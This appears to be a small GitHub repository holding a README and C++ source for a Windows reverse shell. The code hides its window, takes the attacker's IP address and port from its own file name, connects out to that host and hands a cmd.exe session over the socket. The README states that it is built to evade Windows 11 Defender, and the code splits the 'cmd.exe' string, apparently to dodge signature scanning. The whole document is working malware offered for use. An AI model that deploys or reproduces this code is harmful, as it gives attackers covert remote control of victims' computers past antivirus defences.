├── README.md
└── Reverse_shell_2021_12.cpp


/README.md:
--------------------------------------------------------------------------------
1 | # Simple-Reverse-Shell
2 | Simple C++ reverse shell without obfuscation to avoid Win 11 defender detection (At the time of publication)
3 | 
4 | The IP address and port are  hardcoded into the file name (e.g: 192x168x0x122_5555.exe)  
5 | 
6 | <img width="1559" alt="native_reverse_shell" src="https://user-images.githubusercontent.com/62064939/146692938-afe9fc85-7aa9-494b-833b-f0667f4fe523.png">
7 | 


--------------------------------------------------------------------------------
/Reverse_shell_2021_12.cpp:
--------------------------------------------------------------------------------
 1 | #POC reverse shell written by Norbert Tihanyi to bypass Windows 11 Defender (December 2021) 
 2 | #Twitter: @TihanyiNorbert
 3 | 
 4 | #include "stdafx.h"
 5 | #include <winsock2.h>
 6 | #include <stdio.h>
 7 | #include <string>
 8 | 
 9 | #pragma comment(lib,"ws2_32")
10 | #pragma warning(disable:4996) 
11 | WSADATA wsaData; SOCKET s1;
12 | struct sockaddr_in R;
13 | STARTUPINFO A;
14 | PROCESS_INFORMATION B;
15 | using std::string;
16 | string getFileName(const string& s) {
17 | 
18 | 	char sep = '/';
19 | 	
20 | 	#ifdef _WIN32
21 | 		sep = '\\';
22 | 	#endif
23 | 	size_t i = s.rfind(sep, s.length());
24 | 	if (i != string::npos) {
25 | 		return(s.substr(i + 1, s.length() - i));
26 | 	}
27 | 
28 | 	return("");
29 | }
30 | 
31 | int main(int argc, char *argv[])
32 | {
33 | 	FreeConsole(); //Hide window
34 | 	WSAStartup(MAKEWORD(2, 2), &wsaData);
35 | 	string path =getFileName(argv[0]);
36 | 	path.resize(path.size() - 4); //remove .exe from the file
37 | 	//replace x to "."
38 | 	for (int i = 0; i < path.size(); i++) {
39 | 		if (path[i] == 'x') {
40 | 			path[i] = '.';
41 | 		}
42 | 	}
43 | 	//PORT and IP from the executable
44 | 	size_t i = path.rfind("_", path.length());
45 | 	string port = path.substr(i+1, i-path.length());
46 | 	string ip = path.substr(0, i);
47 | 	s1 = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0);
48 | 	R.sin_family = AF_INET;
49 | 	R.sin_port = htons(std::stoul(port, nullptr, 0));
50 | 	R.sin_addr.s_addr = inet_addr(ip.c_str());
51 | 	WSAConnect(s1, (SOCKADDR*)&R, sizeof(R), 0, 0, 0, 0);
52 | 	memset(&A, 0, sizeof(A));
53 | 	A.cb = sizeof(A);
54 | 	A.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
55 | 	A.hStdInput = A.hStdOutput = A.hStdError = (HANDLE)s1;
56 | 	TCHAR c[256] = L"cm";
57 | 	TCHAR d[256] = L"d.exe";
58 | 	CreateProcess(NULL, _tcscat(c, d), 0, 0, 1, 0, 0, 0, &A, &B);
59 | 
60 | }
61 | 
62 | 


--------------------------------------------------------------------------------